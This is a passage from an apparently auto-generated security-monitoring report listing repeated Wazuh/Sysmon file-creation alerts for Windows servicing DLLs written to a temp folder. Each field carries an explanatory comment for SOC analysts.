Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.667352
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1824317Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260600
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.180 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wcp.dll CreationUtcTime: 2025-04-20 01:55:28.180 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.180
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wcp.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.180
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.390+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.390+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.670301
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2039426Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260601
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.202 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wdscore.dll CreationUtcTime: 2025-04-20 01:55:28.202 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.202
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wdscore.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.202
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.420+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.420+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.673266
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2071612Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260602
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.205 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wimgapi.dll CreationUtcTime: 2025-04-20 01:55:28.205 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.205
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wimgapi.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.205
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.421+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.421+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.676231
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2133548Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260603
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.212 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wrpint.dll CreationUtcTime: 2025-04-20 01:55:28.212 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.212
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wrpint.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.212
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.469+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.469+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.679192
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2182589Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260605
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.217 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-base-util-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.217 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.217
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-base-util-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.217
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.469+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.469+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.682282
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2214364Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260606
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.219 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-com-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.219 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.219
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-com-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

